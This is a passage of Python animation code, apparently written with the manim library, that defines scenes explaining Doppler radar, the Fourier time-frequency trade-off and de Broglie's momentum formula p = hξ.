frequency_label.scale(0.7)
frequency_label.next_to(axes.x_axis.get_right(), UP)
axes.add(frequency_label)
self.add(axes)
pulse_x, shift_x = 4, 6
pulse_graph = self.get_spike_graph(pulse_x)
shift_graph = self.get_spike_graph(shift_x)
shift_graph.set_stroke(YELLOW, 2)
peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)
self.add(pulse_graph)
brace = Brace(peak_points, UP, buff = SMALL_BUFF)
displayed_doppler_shift = TextMobject("How I'm showing the \\\\", "Doppler shift")
actual_doppler_shift = TextMobject("Actual\\\\", "Doppler shift")
doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)
doppler_shift_words.set_color(YELLOW)
doppler_shift_words.scale(0.75)
displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)
actual_doppler_shift.move_to(pulse_graph.peak_point)
actual_doppler_shift.align_to(displayed_doppler_shift)
self.play(
Animation(pulse_graph),
self.teacher.change, "raise_right_hand",
run_time = 1
)
self.play(
ShowCreation(shift_graph),
FadeIn(brace),
Write(displayed_doppler_shift, run_time = 1),
self.get_student_changes(*3*["sassy"]),
)
self.play(
UpdateFromAlphaFunc(
shift_graph,
lambda g, a : Transform(
g, self.get_spike_graph(
interpolate(shift_x, pulse_x+0.01, a),
).match_style(shift_graph)
).update(1),
),
UpdateFromFunc(
brace,
lambda b : b.match_width(
peak_points, stretch = True
).next_to(peak_points, UP, SMALL_BUFF)
),
Transform(
displayed_doppler_shift, actual_doppler_shift,
rate_func = squish_rate_func(smooth, 0.3, 0.6)
),
run_time = 3
)
self.wait(2)
everything = VGroup(
title,
axes, pulse_graph, shift_graph,
brace, displayed_doppler_shift
)
rect = SurroundingRectangle(everything, color = WHITE)
everything.add(rect)
self.teacher_says(
"I'll ignore certain \\\\ nuances for now.",
target_mode = "shruggie",
added_anims = [
everything.scale, 0.4,
everything.to_corner, UP+LEFT,
UpdateFromAlphaFunc(
rect, lambda m, a : m.set_stroke(width = 2*a)
)
],
)
self.change_student_modes(*3*["hesitant"])
self.wait(2)
def get_spike_graph(self, x, color = RED, **kwargs):
graph = self.axes.get_graph(
lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),
color = color,
**kwargs
)
graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))
graph.add(graph.peak_point)
return graph
class TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):
def construct(self):
x = 7
freq = 25
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -2, y_max = 2,
)
axes.center()
title = TextMobject("Echo signal")
title.next_to(axes.y_axis, UP)
axes.add(title)
axes.to_edge(UP)
graph = self.get_frequency_pulse_graph(x = x, freq = freq)
graph.background_image_file = "blue_yellow_gradient"
arrow = Arrow(
axes.coords_to_point(0, -1.5),
axes.coords_to_point(x, -1.5),
color = WHITE,
buff = SMALL_BUFF,
)
time = TextMobject("Time")
time.next_to(arrow, DOWN, SMALL_BUFF)
delta_x = 0.7
brace = Brace(
Line(
axes.coords_to_point(x-delta_x, 1),
axes.coords_to_point(x+delta_x, 1)
),
UP
)
frequency = TextMobject("Frequency")
frequency.set_color(YELLOW)
frequency.next_to(brace, UP, SMALL_BUFF)
time_updown_arrow = TexMobject("\\Updownarrow")
time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)
freq_updown_arrow = time_updown_arrow.copy()
freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)
distance = TextMobject("Distance")
distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)
velocity = TextMobject("Velocity")
velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)
VGroup(freq_updown_arrow, velocity).match_style(frequency)
self.add(axes)
self.play(ShowCreation(graph))
self.play(
GrowArrow(arrow),
LaggedStartMap(FadeIn, time, run_time = 1)
)
self.play(
GrowFromCenter(brace),
LaggedStartMap(FadeIn, frequency, run_time = 1)
)
self.wait()
self.play(
GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),
ReplacementTransform(
time.copy().fade(1),
distance
)
)
self.play(
GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),
ReplacementTransform(
frequency.copy().fade(1),
velocity
)
)
self.wait()
class RadarOperatorUncertainty(Scene):
def construct(self):
dish = RadarDish()
dish.scale(3)
dish.move_to(4*RIGHT + 2*DOWN)
dish_words = TextMobject("3b1b industrial \\\\ enterprises")
dish_words.scale(0.25)
dish_words.set_stroke(BLACK, 0.5)
dish_words.set_color(BLACK)
dish_words.move_to(dish, DOWN)
dish_words.shift(SMALL_BUFF*(UP+2*LEFT))
dish.add(dish_words)
randy = Randolph()
randy.next_to(dish, LEFT, aligned_edge = DOWN)
bubble = randy.get_bubble(
width = 7,
height = 4,
)
echo_object = Square()
echo_object.move_to(dish)
echo_object.shift(FRAME_X_RADIUS*RIGHT)
pulse = RadarPulse(dish, echo_object, speed = 6)
plane = Plane().scale(0.5)
plane.move_to(bubble.get_bubble_center()+LEFT)
plane_cloud = ProbabalisticMobjectCloud(
plane,
fill_opacity = 0.3,
n_copies = 10,
)
plane_gdw = plane_cloud.gaussian_distribution_wrapper
vector_cloud = ProbabalisticVectorCloud(
center_func = plane_gdw.get_center,
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.scale(0.05)
vector_gdw.move_to(plane_gdw)
vector_gdw.shift(2*RIGHT)
self.add(randy, dish, bubble, plane_cloud, pulse)
self.play(randy.change, "confused")
self.wait(3)
self.add(vector_cloud)
for i in range(3):
for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):
pulse.internal_time = 0
pulse.frequency = freq
self.play(
randy.change, "pondering", plane,
plane_gdw.scale, plane_factor,
vector_gdw.scale, vector_factor,
)
self.wait(2)
class AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):
CONFIG = {
"object_x_coords" : [7, 4, 6, 9, 8],
"frequency_spread_factor" : 200,
"n_pulse_singletons" : 16,
"pulse_frequency" : 0.025,
}
def construct(self):
self.setup_axes()
self.setup_objects()
self.send_long_pulse_single_echo()
self.introduce_multiple_objects()
self.use_short_pulse()
self.fourier_transform_of_one_pulse()
self.show_echos_of_moving_objects()
self.overlapping_frequenies_of_various_objects()
self.echos_of_long_pure_signal_in_frequency_space()
self.concentrated_fourier_requires_long_time()
def setup_axes(self):
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5,
)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
axes.center()
axes.shift(DOWN)
self.add(axes)
dish = self.dish = RadarDish()
dish.move_to(axes, LEFT)
dish.to_edge(UP, buff = LARGE_BUFF)
self.add(dish)
def setup_objects(self):
objects = self.objects = VGroup(
Plane().flip(),
SVGMobject(
file_name = "blimp",
color = BLUE_C,
height = 0.5,
),
SVGMobject(
file_name = "biplane",
color = RED_D,
height = 0.5,
),
SVGMobject(
file_name = "helicopter",
color = LIGHT_GREY,
height = 0.5,
).rotate(-TAU/24),
FalconHeavy(),
)
y_shifts = [0.25, 0, 0.5, 0.25, -0.5]
for x, y, obj in zip(self.object_x_coords, y_shifts, objects):
obj.move_to(self.axes.coords_to_point(x, 0))
obj.align_to(self.dish)
obj.shift(y*UP)
self.object_velocities = [
0.7*LEFT,
0.1*RIGHT,
0.4*LEFT,
0.4*RIGHT,
0.5*UP,
]
def send_long_pulse_single_echo(self):
x = self.object_x_coords[0]
plane = self.objects[0]
self.add(plane)
randy = self.pi_creature
self.remove(randy)
pulse_graph = self.get_frequency_pulse_graph(x)
pulse_graph.background_image_file = "blue_yellow_gradient"
pulse = self.get_pulse(self.dish, plane)
brace = Brace(
Line(
self.axes.coords_to_point(x-1, 1),
self.axes.coords_to_point(x+1, 1),
), UP
)
words = brace.get_text("Spread over time")
self.add(pulse)
self.wait()
squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)
self.play(
ShowCreation(pulse_graph, rate_func=linear),
GrowFromCenter(brace, rate_func = squished_rate_func),
Write(words, rate_func = squished_rate_func),
run_time = 3,
)
self.remove(pulse)
self.play(FadeIn(randy))
self.play(PiCreatureBubbleIntroduction(
randy, "Who cares?",
bubble_class = ThoughtBubble,
bubble_kwargs = {
"direction" : LEFT,
"width" : 2,
"height": 1.5,
},
target_mode = "maybe",
look_at_arg = brace,
))
self.play(Blink(randy))
self.play(LaggedStartMap(
FadeOut, VGroup(
randy.bubble, randy.bubble.content,
brace, words,
)
))
self.curr_graph = pulse_graph
def introduce_multiple_objects(self):
objects = self.objects
x_coords = self.object_x_coords
curr_graph = self.curr_graph
randy = self.pi_creature
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
graphs.set_color_by_gradient(BLUE, YELLOW)
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
noise_function = lambda t : np.sum([
0.5*np.sin(f*t)/f
for f in (2, 3, 5, 7, 11, 13)
])
noisy_graph = self.axes.get_graph(
lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),
num_graph_points = 1000
)
for graph in sum_graph, noisy_graph:
graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(
LaggedStartMap(GrowFromCenter, objects[1:]),
FadeOut(curr_graph),
randy.change, "pondering"
)
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "confused"
)
self.remove(*pulses)
self.play(randy.change, "pondering")
self.play(Transform(
sum_graph, noisy_graph,
rate_func = lambda t : wiggle(t, 4),
run_time = 3
))
self.wait(2)
self.curr_graph = sum_graph
def use_short_pulse(self):
curr_graph = self.curr_graph
objects = self.objects
x_coords = self.object_x_coords
randy = self.pi_creature
self.frequency_spread_factor = 10
self.n_pulse_singletons = 4
self.pulse_frequency = 0.015
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
sum_graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(FadeOut(curr_graph))
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "happy"
)
self.wait()
self.curr_graph = sum_graph
self.first_echo_graph = graphs[0]
self.first_echo_graph.set_color(YELLOW)
def fourier_transform_of_one_pulse(self):
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {
"unit_size" : 0.5,
"tick_frequency" : 2,
},
y_min = -.01, y_max = .01,
y_axis_config = {
"unit_size" : 110,
"tick_frequency" : 0.006
}
)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(frequency_label)
first_echo_graph = self.first_echo_graph
self.play(
ApplyMethod(
VGroup(self.axes, first_echo_graph).to_edge, UP,
{"buff" : SMALL_BUFF},
rate_func = squish_rate_func(smooth, 0.5, 1)
),
LaggedStartMap(FadeOut, self.objects),
LaggedStartMap(FadeOut, VGroup(
self.curr_graph, self.dish, self.pi_creature
)),
run_time = 2
)
#
frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)
fourier_graph = get_fourier_graph(
frequency_axes, first_echo_graph.underlying_function,
t_min = 0, t_max = 25,
complex_to_real_func = np.abs,
)
fourier_graph.save_state()
fourier_graph.move_to(first_echo_graph)
h_vect = 4*RIGHT
fourier_graph.shift(h_vect)
fourier_graph.fade(1)
f = 8
v_line = DashedLine(
frequency_axes.coords_to_point(f, 0),
frequency_axes.coords_to_point(f, frequency_axes.y_max),
)
v_lines = VGroup(
v_line.copy().shift(2*LEFT),
v_line.copy().shift(2*RIGHT),
)
rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)
rect.replace(v_lines, stretch = True)
rect.save_state()
rect.stretch(0, 0)
self.play(Write(frequency_axes, run_time = 1))
self.play(
ApplyFunction(
lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),
first_echo_graph.copy(),
remover = True,
),
fourier_graph.restore
)
self.wait()
self.play(ShowCreation(v_line))
self.play(
ReplacementTransform(VGroup(v_line), v_lines),
rect.restore
)
self.wait()
self.play(FadeOut(v_lines), FadeOut(rect))
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
def show_echos_of_moving_objects(self):
objects = self.objects
objects.save_state()
object_velocities = self.object_velocities
movements = self.object_movements = [
always_shift(
obj,
direction = v/get_norm(v),
rate = get_norm(v)
)
for v, obj in zip(object_velocities, objects)
]
pulses = self.get_pulses()
continual_anims = pulses+movements
self.play(
FadeOut(self.axes),
FadeOut(self.first_echo_graph),
LaggedStartMap(FadeIn, objects),
FadeIn(self.dish)
)
self.add(*continual_anims)
self.wait(4)
self.play(*[
UpdateFromAlphaFunc(
obj,
lambda m, a : m.set_fill(opacity = 1-a),
)
for obj in objects
])
self.remove(*continual_anims)
self.wait()
def overlapping_frequenies_of_various_objects(self):
frequency_axes = self.frequency_axes
fourier_graph = self.fourier_graph
shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)
color = fourier_graph.get_color()
shifted_graphs.set_color_by_gradient(
average_color(color, WHITE),
color,
average_color(color, BLACK),
)
sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)
sum_graph.match_style(fourier_graph)
shifted_graphs.save_state()
self.play(ReplacementTransform(
VGroup(fourier_graph), shifted_graphs,
lag_ratio = 0.5,
run_time = 2
))
self.wait()
self.play(
shifted_graphs.arrange, DOWN,
shifted_graphs.move_to, fourier_graph, DOWN,
)
self.wait()
self.play(shifted_graphs.restore)
self.play(ReplacementTransform(
shifted_graphs, VGroup(sum_graph),
))
self.wait()
self.curr_fourier_graph = sum_graph
def echos_of_long_pure_signal_in_frequency_space(self):
curr_fourier_graph = self.curr_fourier_graph
f_max = self.frequency_axes.y_max
new_fourier_graph = self.frequency_axes.get_graph(
lambda x : f_max * np.exp(-100*(x-8)**2),
num_graph_points = 1000,
)
new_fourier_graph.set_color(PINK)
self.play(
FadeOut(curr_fourier_graph),
FadeIn(new_fourier_graph),
)
self.fourier_graph = new_fourier_graph
self.overlapping_frequenies_of_various_objects()
def concentrated_fourier_requires_long_time(self):
objects = self.objects
objects.restore()
object_movements = self.object_movements
self.n_pulse_singletons = 32
pulses = self.get_pulses()
randy = self.pi_creature
continual_anims = object_movements+pulses
self.play(FadeIn(randy))
self.add(*continual_anims)
self.play(randy.change, "angry", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))
for obj in objects
])
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
self.play(randy.change, "plain", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))
for obj in objects
])
self.wait()
###
def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):
graph = IntroduceDopplerRadar.get_frequency_pulse_graph(
self, x, freq, **kwargs
)
return graph
def get_pulse(self, dish, echo_object):
return RadarPulse(
dish, echo_object,
n_pulse_singletons = self.n_pulse_singletons,
frequency = 0.025,
speed = 5.0,
)
def get_pulses(self):
return [
self.get_pulse(
self.dish.copy().shift(0.01*obj.get_center()[0]),
obj
)
for obj in self.objects
]
def create_pi_creature(self):
randy = Randolph()
randy.scale(0.5).flip()
randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)
return randy
def get_shifted_frequency_graphs(self, fourier_graph):
frequency_axes = self.frequency_axes
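# Doppler-shift the echo's frequency profile: each object's horizontal velocity
# component v[0] slides the Fourier graph along the frequency axis by 5*v[0],
# with the input clipped so the shifted graph stays within the axes.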
def get_func(v):
return lambda f : fourier_graph.underlying_function(np.clip(
f-5*v[0],
frequency_axes.x_min,
frequency_axes.x_max,
))
def get_graph(func):
return frequency_axes.get_graph(func)
shifted_graphs = VGroup(*list(map(
get_graph, list(map(get_func, self.object_velocities))
)))
shifted_graphs.match_style(fourier_graph)
return shifted_graphs
def get_sum_graph(self, axes, graphs):
def get_func(graph):
return graph.underlying_function
funcs = list(map(get_func, graphs))
return axes.get_graph(
lambda t : sum([func(t) for func in funcs]),
)
class SummarizeFourierTradeoffForDoppler(Scene):
def construct(self):
time_axes = Axes(
x_min = 0, x_max = 12,
y_min = -0.5, y_max = 1,
)
time_axes.center().to_edge(UP, buff = LARGE_BUFF)
frequency_axes = time_axes.copy()
frequency_axes.next_to(time_axes, DOWN, buff = 2)
time_label = TextMobject("Time")
frequency_label = TextMobject("Frequency")
for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):
label.next_to(axes.get_right(), UP, SMALL_BUFF)
axes.add(label)
frequency_label.shift_onto_screen()
title = TextMobject("Fourier Trade-off")
title.next_to(time_axes, DOWN)
self.add(title)
#Position determines log of scale value for exponentials
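# Sliding a_mob to the right increases a = exp(x): the time-domain bumps
# exp(-5a(t-x)^2) get narrower while the frequency-domain bumps exp(-(5/a)(t-v)^2)
# get wider, and vice versa -- the Fourier trade-off this scene summarizes.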
a_mob = VectorizedPoint()
x_values = [3, 5, 6, 7, 8]
v_values = [5, 5.5, 5.75, 6.5, 7]
def get_top_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))
for x in x_values
])
graphs.set_color(WHITE)
graphs.color_using_background_image("blue_yellow_gradient")
return graphs
def get_bottom_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))
for v in v_values
])
graphs.set_color(RED)
return graphs
top_graphs = get_top_graphs()
bottom_graphs = get_bottom_graphs()
update_top_graphs = Mobject.add_updater(
top_graphs,
lambda g : Transform(g, get_top_graphs()).update(1)
)
update_bottom_graphs = Mobject.add_updater(
bottom_graphs,
lambda g : Transform(g, get_bottom_graphs()).update(1)
)
self.add(time_axes, frequency_axes)
self.add(update_top_graphs, update_bottom_graphs)
shift_vect = 2*RIGHT
for s in 1, -2, 1:
self.play(a_mob.shift, s*shift_vect, run_time = 3)
class MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):
pass
class IntroduceDeBroglie(Scene):
CONFIG = {
"default_wave_frequency" : 1,
"wave_colors" : [BLUE_D, YELLOW],
"dispersion_factor" : 1,
"amplitude" : 1,
}
def construct(self):
text_scale_val = 0.8
#Overlay real tower in video editor
eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)
picture = ImageMobject("de_Broglie")
picture.set_height(4)
picture.to_corner(UP+LEFT)
name = TextMobject("Louis de Broglie")
name.next_to(picture, DOWN)
picture.save_state()
picture.scale(0)
picture.move_to(eiffel_tower.get_top())
broadcasts = [
Broadcast(
eiffel_tower.get_top(),
big_radius = 10,
n_circles = 10,
lag_ratio = 0.9,
run_time = 7,
rate_func = squish_rate_func(smooth, a, a+0.3),
color = WHITE,
)
for a in np.linspace(0, 0.7, 3)
]
self.play(*broadcasts)
self.play(picture.restore)
self.play(Write(name))
self.wait()
#Time line
time_line = NumberLine(
x_min = 1900,
x_max = 1935,
tick_frequency = 1,
numbers_with_elongated_ticks = list(range(1900, 1941, 10)),
color = BLUE_D
)
time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)
time_line.add_numbers(*time_line.numbers_with_elongated_ticks)
time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)
year_to_words = {
1914 : "Wold War I begins",
1915 : "Einstein field equations",
1916 : "Lewis dot formulas",
1917 : "Not a lot of physics...because war",
1918 : "S'more Rutherford badassery",
1919 : "Eddington confirms general relativity predictions",
1920 : "World is generally stoked on general relativity",
1921 : "Einstein gets long overdue Nobel prize",
1922 : "Stern-Gerlach Experiment",
1923 : "Compton scattering observed",
1924 : "de Broglie's thesis"
}
arrow = Vector(DOWN, color = WHITE)
arrow.next_to(time_line.number_to_point(1914), UP)
words = TextMobject(year_to_words[1914])
words.scale(text_scale_val)
date = Integer(1914)
date.next_to(arrow, UP, LARGE_BUFF)
def get_year(alpha = 0):
return int(time_line.point_to_number(arrow.get_end()))
def update_words(words):
text = year_to_words.get(get_year(), "Hi there")
if text not in words.get_tex_string():
words.__init__(text)
words.scale(text_scale_val)
words.move_to(interpolate(
arrow.get_top(), date.get_bottom(), 0.5
))
update_words(words)
self.play(
FadeIn(time_line),
GrowArrow(arrow),
Write(words),
Write(date),
run_time = 1
)
self.wait()
self.play(
arrow.next_to, time_line.number_to_point(1924), UP,
ChangingDecimal(
date, get_year,
position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)
),
UpdateFromFunc(words, update_words),
run_time = 3,
)
self.wait()
#Transform time_line
line = time_line
self.play(
FadeOut(time_line.numbers),
VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,
*[
ApplyFunction(
lambda m : m.rotate(TAU/4).set_stroke(width = 0),
mob,
remover = True
)
for mob in time_line.tick_marks
]
)
#Wave function
particle = VectorizedPoint()
axes = Axes(x_min = -1, x_max = 10)
axes.match_width(line)
axes.shift(line.get_center() - axes.x_axis.get_center())
im_line = line.copy()
im_line.set_color(YELLOW)
wave_update_animation = self.get_wave_update_animation(
axes, particle, line, im_line
)
for x in range(3):
particle.move_to(axes.coords_to_point(-10, 0))
self.play(
ApplyMethod(
particle.move_to, axes.coords_to_point(22, 0),
rate_func=linear
),
wave_update_animation,
run_time = 3
)
self.wait()
###
def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):
line = Line(
axes.x_axis.get_left(),
axes.x_axis.get_right(),
)
if re_line is None:
re_line = line.copy()
re_line.set_color(self.wave_colors[0])
if im_line is None:
im_line = line.copy()
im_line.set_color(self.wave_colors[1])
lines = VGroup(im_line, re_line)
def update_lines(lines):
waves = self.get_wave_pair(axes, particle)
for line, wave in zip(lines, waves):
wave.match_style(line)
Transform(line, wave).update(1)
return UpdateFromFunc(lines, update_lines)
def get_wave(
self, axes, particle,
complex_to_real_func = lambda z : z.real,
freq = None,
**kwargs):
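# A rough dispersive wave packet: a (co)sine of spatial frequency `freq` under a
# Gaussian envelope centered on the particle, whose width grows as the particle
# moves away from the origin; complex_to_real_func picks the real or imaginary part.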
freq = freq or self.default_wave_frequency
k0 = 1./freq
t0 = axes.x_axis.point_to_number(particle.get_center())
def func(x):
dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))
wave_part = complex_to_real_func(np.exp(
complex(0, TAU*freq*(x-dispersion))
))
bell_part = np.exp(-dispersion*(x-t0)**2)
amplitude = self.amplitude
return amplitude*wave_part*bell_part
graph = axes.get_graph(func)
return graph
def get_wave_pair(self, axes, particle, colors = None, **kwargs):
if colors is None and "color" not in kwargs:
colors = self.wave_colors
return VGroup(*[
self.get_wave(
axes, particle,
C_to_R, color = color,
**kwargs
)
for C_to_R, color in zip(
[lambda z : z.imag, lambda z : z.real],
colors
)
])
class ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):
CONFIG = {
"default_wave_frequency" : 2,
"dispersion_factor" : 0.25,
"p_color" : BLUE,
"xi_color" : YELLOW,
"amplitude" : 0.5,
}
def construct(self):
self.introduce_formula()
self.react_to_claim()
def introduce_formula(self):
formula = p, eq, h, xi = TexMobject("p", "=", "h", "\\xi")
formula.move_to(ORIGIN)
formula.scale(1.5)
word_shift_val = 1.75
p_words = TextMobject("Momentum")
p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)
p_arrow = Arrow(
p_words.get_bottom(), p.get_corner(UP+LEFT),
buff = SMALL_BUFF
)
added_p_words = TextMobject("(Classically $m \\times v$)")
added_p_words.move_to(p_words, DOWN)
VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)
xi_words = TextMobject("Spatial frequency")
added_xi_words = TextMobject("(cycles per unit \\emph{distance})")
xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)
xi_words.align_to(p_words)
xi_arrow = Arrow(
xi_words.get_bottom(), xi.get_corner(UP+RIGHT),
buff = SMALL_BUFF
)
added_xi_words.move_to(xi_words, DOWN)
added_xi_words.align_to(added_p_words, DOWN)
VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)
axes = Axes(
x_min = 0, x_max = FRAME_WIDTH,
y_min = -1, y_max = 1,
)
axes.center().to_edge(UP, buff = -0.5)
# axes.next_to(formula, RIGHT)
particle = VectorizedPoint()
wave_update_animation = self.get_wave_update_animation(axes, particle)
wave = wave_update_animation.mobject
wave[0].set_stroke(width = 0)
particle.next_to(wave, LEFT, buff = 2)
wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),
wave_update_animation,
run_time = 4,
rate_func=linear,
)
stopped_wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, xi_words),
wave_update_animation,
run_time = 3,
rate_func=linear,
)
n_v_lines = 10
v_lines = VGroup(*[
DashedLine(UP, DOWN)
for x in range(n_v_lines)
])
v_lines.match_color(xi)
v_lines.arrange(
RIGHT,
buff = float(axes.x_axis.unit_size)/self.default_wave_frequency
)
v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)
v_lines.align_to(wave)
v_lines.shift(0.125*RIGHT)
self.add(formula, wave)
self.play(
self.teacher.change, "raise_right_hand",
GrowArrow(p_arrow),
Succession(
Write, p_words,
ApplyMethod, p_words.next_to, added_p_words, UP,
),
FadeIn(
added_p_words,
rate_func = squish_rate_func(smooth, 0.5, 1),
run_time = 2,
),
wave_propagation
)
self.play(
Write(xi_words),
GrowArrow(xi_arrow),
self.get_student_changes("confused", "erm", "sassy"),
stopped_wave_propagation
)
self.play(
FadeIn(added_xi_words),
xi_words.next_to, added_xi_words, UP,
)
self.play(
LaggedStartMap(ShowCreation, v_lines),
self.get_student_changes(*["pondering"]*3)
)
self.play(LaggedStartMap(FadeOut, v_lines))
self.wait()
self.formula_labels = VGroup(
p_words, p_arrow, added_p_words,
xi_words, xi_arrow, added_xi_words,
)
self.set_variables_as_attrs(wave, wave_propagation, formula)
def react_to_claim(self):
formula_labels = self.formula_labels
full_formula = VGroup(self.formula, formula_labels)
full_formula.save_state()
wave_propagation = self.wave_propagation
student = self.students[2]
self.student_says(
"Hang on...",
bubble_kwargs = {"height" : 2, "width" : 2, "direction" : LEFT},
target_mode = "sassy",
student_index = 2,
added_anims = [self.teacher.change, "plain"]
)
student.bubble.add(student.bubble.content)
self.wait()
kwargs = {
"path_arc" : TAU/4,
"lag_ratio" : 0.5,
"lag_ratio" : 0.7,
"run_time" : 1.5,
}
self.play(
full_formula.scale, 0,
full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,
Animation(student.bubble),
**kwargs
)
self.play(full_formula.restore, Animation(student.bubble), **kwargs)
wave_propagation.update_config(
rate_func = lambda a : interpolate(0.35, 1, a)
)
self.play(
wave_propagation,
RemovePiCreatureBubble(student, target_mode = "confused"),
)
wave_propagation.update_config(rate_func = lambda t : t)
self.student_says(
"Physics is \\\\ just weird",
bubble_kwargs = {"height" : 2.5, "width" : 3},
target_mode = "shruggie",
student_index = 0,
added_anims = [ApplyMethod(full_formula.shift, UP)]
)
self.wait()
self.play(
wave_propagation,
ApplyMethod(full_formula.shift, DOWN),
FadeOut(self.students[0].bubble),
FadeOut(self.students[0].bubble.content),
self.get_student_changes(*3*["pondering"]),
self.teacher.change, "pondering",
)
self.play(wave_propagation)
class AskPhysicists(PiCreatureScene):
def construct(self):
morty, physy1, physy2, physy3 = self.pi_creatures
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"\\xi" : YELLOW,
})
formula.scale(1.5)
formula.to_edge(UP)
formula.save_state()
formula.shift(DOWN)
formula.fade(1)
self.play(formula.restore)
self.pi_creature_says(
morty, "So...why?",
target_mode = "maybe"
)
self.wait(2)
self.play(
RemovePiCreatureBubble(morty),
PiCreatureSays(
physy2,
"Take the Schrödinger equation \\\\ with $H = \\frac{p^2}{2m}+V(x)$",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy1,
"Even classically position and \\\\ momentum are conjugate",
target_mode = "surprised",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy3,
"Consider special relativity \\\\ together with $E = hf$",
target_mode = "hooray",
bubble_kwargs = {"fill_opacity" : 0.9},
),
morty.change, "guilty"
)
self.wait(2)
###
def create_pi_creatures(self):
scale_factor = 0.85
morty = Mortimer().flip()
morty.scale(scale_factor)
morty.to_corner(DOWN+LEFT)
physies = VGroup(*[
PiCreature(color = c).flip()
for c in (GREY, LIGHT_GREY, DARK_GREY)
])
physies.arrange(RIGHT, buff = MED_SMALL_BUFF)
physies.scale(scale_factor)
physies.to_corner(DOWN+RIGHT)
self.add(physies)
return VGroup(morty, *physies)
class SortOfDopplerEffect(PiCreatureScene):
CONFIG = {
"omega" : np.pi,
"arrow_spacing" : 0.25,
}
def setup(self):
PiCreatureScene.setup(self)
rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)
rect.set_stroke(width = 0)
self.camera = MovingCamera(
rect, **self.camera_config
)
def construct(self):
screen_rect = self.screen_rect
#x-coordinate gives time
t_tracker = VectorizedPoint()
#x-coordinate gives wave number
k_tracker = VectorizedPoint(2*RIGHT)
always_shift(t_tracker, RIGHT, 1)
def get_wave():
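# Traveling wave 0.5*cos(omega*t - k*x), drawn both as a graph and as a field of
# vertical arrows; t and k are read off the trackers, and the color interpolates
# from BLUE toward RED as k grows, mimicking a Doppler-style frequency shift.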
t = t_tracker.get_center()[0]
k = k_tracker.get_center()[0]
omega = self.omega
color = interpolate_color(
